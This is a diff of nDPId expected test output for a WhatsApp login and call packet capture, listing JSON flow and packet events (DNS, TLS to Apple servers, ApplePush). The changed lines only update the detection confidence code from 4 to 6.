
@@ -44,16 +44,16 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582225533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582225533,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAooItAAEAGYbXAqAIEEaxkN8ANAbtmBk0CJP5uKFAQ\/\/9vTQAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432582227526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1432582227526,"pkt":"xiwDYGpkAPS5Jrv0CABFAABBdxsAAEARfjvAqAIEwKgCAcq5ADUALb4mNPgBAAABAAAAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAQ=="} 
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227526,"flow_last_seen":1432582227526,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1432582227526,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432582227594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":251,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":251,"pkt_l4_len":217,"thread_ts_msec":1432582227594,"pkt":"APS5Jrv0xiwDYGpkCABFAADtqMoAAEARS+DAqAIBwKgCBAA1yrkA2SFYNPiBgAABAAkAAAAABXF1ZXJ5A2VzcwVhcHBsZQNjb20AAAEAAcAMAAUAAQAASFYAIAVxdWVyeQllc3MtYXBwbGUDY29tBmFrYWRucwNuZXQAwDEAAQABAAAAOwAEEbJoDMAxAAEAAQAAADsABBGyaA7AMQABAAEAAAA7AAQRsmgnwDEAAQABAAAAOwAEEbJoJsAxAAEAAQAAADsABBGyaA3AMQABAAEAAAA7AAQRsmgPwDEAAQABAAAAOwAEEbJoC8AxAAEAAQAAADsABBGyaBA="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582227594,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.104.12"}} 
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582227594,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"query.ess.apple.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.104.12"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432582227595,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1432582227595,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+I5EAAEAR0cjAqAIEwKgCAcveADUAKv\/L36MBAAABAAAAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAQ=="} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227595,"flow_last_seen":1432582227595,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432582227595,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227604,"flow_last_seen":1432582227604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227604,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432582227604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227604,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZF5AAEAGme\/AqAIEEbJoDMAxAbvjm5\/WAAAAALAC\/\/9XjAAAAgQFtAEDAwQBAQgKLfovrgAAAAAEAgAA"} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432582227624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1432582227624,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+d\/oAAEARfN\/AqAIBwKgCBAA1y94AqhSs36OBgAABAAgAAAAAA2UxMwh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAC20ABJ5V6TTADAABAAEAAAttAASeVTpKwAwAAQABAAALbQAEuK2zJ8AMAAEAAQAAC20ABJ5VOnfADAABAAEAAAttAAS4rbMlwAwAAQABAAALbQAEnlU6M8AMAAEAAQAAC20ABK4k0i3ADAABAAEAAAttAASeVQXI"} 
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582227624,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e13.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"158.85.233.52"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582227643,"flow_last_seen":1432582227643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582227643,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1432582227643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582227643,"pkt":"xiwDYGpkAPS5Jrv0CABFAABACXVAAEAGAsTAqAIEuK2zJcAyFGaCPuKZAAAAALAC\/\/9xPwAAAgQFtAEDAwQBAQgKLfov1AAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432582227797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582227797,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8rYsAADQGqrG4rbMlwKgCBBRmwDLYm8Xcgj7imqAS\/\/9JMQAAAgQFrAEDAwkEAggKD\/GKmy36L9Q="} 
@@ -62,22 +62,22 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1432582227885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227885,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0779AAEAGHIXAqAIEuK2zJcAyFGaCPuKa2JvF3YAQIFhWrQAAAQEICi36MMYP8Yqb"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432582227886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582227886,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0rZoAAO4G4r4RsmgMwKgCBAG7wDE71dh745uf14ASH\/64\/gAAAgQFoAEDAwQBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432582227887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582227887,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo79dAAEAGDo7AqAIEEbJoDMAxAbvjm5\/XO9XYfFAQQADZtwAA"} 
-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432582228152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228152,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UDkAAO4GQB4RsmgOwKgCBAG7wDON4auhp3wzpIASH\/48GwAAAgQFoAEDAwQBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1432582228167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582228167,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoC8AAAEAGMqTAqAIEEbJoDsAzAbunfDOkAAAAAFAEAADWZAAA"} -01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} +01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1432582228503,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXUnXJAAEAG3ojAqAIEEW7lDsApFGe4aEuG1IsaTIAQIAA3PgAAAQEICi36MxJvhmvfFwMBACDgnfLWgV8g\/pw7jjX\/\/3ZDH1tB+gK1jE9k\/rmu6RmKPhcDAQdQwvKiQZwynx6ML8uHDg8WgbZIBNPdSiBPAiHm7VZMSxjHJ7BGJ8hRCNCOXC6LyliytHBkvL\/WQAE0iyMMgIlOMed9vHW1FQrPwtxifubqT35jWP9Nwm9hOQ2sUXPF6J6ZcqeRRxjts4LAxUp+ZVHbqO88UycvtArFRoKmsjwuTsOHFL0h\/BX9z3nWEUxaS9mVyhudzOuBlhf3aNgcppeJ3Mr6DsSPYDWrJ1Ko6GUQ6Mz7WhKyRp+OhCR+8vNcJ+2CIpa9aPiStGZvZFFuJ5eoJiBK6lrgPDyxxPa\/Z82Zx7iZHY+\/ajmPTXvQU4j7rC5OlL\/ZO1JkHVVmXmK1\/n5cUDYPvmxuWKEEWDx8eNxgRC58OMj0i5sHQHDG+ZLwIW4R3Ebyfp++7DjTwhy7uHM9lVzOAa6qgVVbeWZWLm5Zp4udgSHyIGs6plbNOhN8Lb7TTV3BFKBjCbwxtnCR+8lPTlOVAewtoM48Z0qRSJODl9LDmyJOnkTl+LQlbM7hWhZq\/VVyYDivHB+RnYZFdt7ZvWbMsFi9dXD6LjMsdLkj0RU\/SFA5gXvUGWy9x04Yo\/WqRH7ng0WIs\/oAxdVKAH0RL\/egfgAwRrcRgu3dPMqb8b19+PmNfa+WFGFnW0JLuexKCM9POmeD5yw6nk\/ac9Raq2rKcykqXxndrastmOjTbplC4qeRqr0LASV9tRAtG4WvYwC\/dfTiBawq859mBNGrglJvult9KPMKQPFULDG6x+KBv4eYpxjRc54qoabZQMWqqc+\/C0Emvy+eYJXsquvu+83ilyZ2N5sYlJ92HKH8JfE8JTIg5o3c9zLm5ZWhw8+NmQ
Mwd0i5bU9vg06cROWuAG\/JN1YaR0pdUTITubm5mlduwzPQc2BVmXII2GZu105+s7qlJpQzMmRVjoqYtbOeWHJKIQ4UQdZCqzpz4AcWUN7LNHzsfvI5B8mXgc+B7aL8Y8jc2YqBmFk1dHfnjKeYCxGmRBZHJy7WbY9uViabjXvTq6pmYIGh+8lsYGwBwhWNapwWuc8Bw0b65ZKVGVcMKolOabscbWi+EYPJjuvFKgqZscrMC1dXZUtfdGPsPdXUlxbBMQ2Kup7KMqRXjqDlL2rJPpRC\/J6FfjQ+IKNfM\/RVAKV8teQWPRPthAH1FIrtEy51cDQixMgza8uftMRBKRfqEYXF7XVD5164o\/Mck2RudrQlyQmifMkcXuuW1kb2sTQoTz3p0Ox09YvEjxH+5SXf2MqAQ5cwiqd8fGHwSVuprE4y5B+B+0nEsRucTP\/97X6ZaOAcSRCuPQgdHN1NHCSQ8002IEFsPCRXQaWhb\/8KMjfJXXs1I3Eouoy5fGg9Eon7zV6InzJDOtmcVxRzUBgfDR1DGBIMOusKSnnAX1htfNBhCsM31KRySVA9BnU7p8tKS\/3BfJCTQQBoGTP2MoOxAiFKkSgXEh3w0kC\/x4kpimxmzxtGXOOQBZWNBgxyNTYgb0Sf9nOE+sqmGbSG7xueIM5u7Dd864xcMPmVsE1VcOkz2PMHbXIHe+roLyX2aqyb6Yu22cChJiPbSlY+mRr9siD+E7u3KnznXJcpEJBSd3utMm4QryOQBR9FCdalU2IyjVmAb148IpK6Ghgjmw7oVrHdCZXaVw+zfL1FhqC9Bd1VFHiBGm211UlGgrjedJW7mv5NM2z0cPLUMCaZycFw6G4KQN6aDAE1rL1eqhrIxxsuhCw0HsrKiJLLdGsa1+3Rf\/uEKt1c0Ng9dAzkrCJEwEwHx3trkLyhj9\/ja7mEqYBSp5Sx0mCtwBbfi6wnI8gTgb3WlgH0Ha3ke8bRCbeKw4dCUR0GSPUQYm4lO6VKKERImy3aoUDOHbtquSKZKUtb1hVt"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 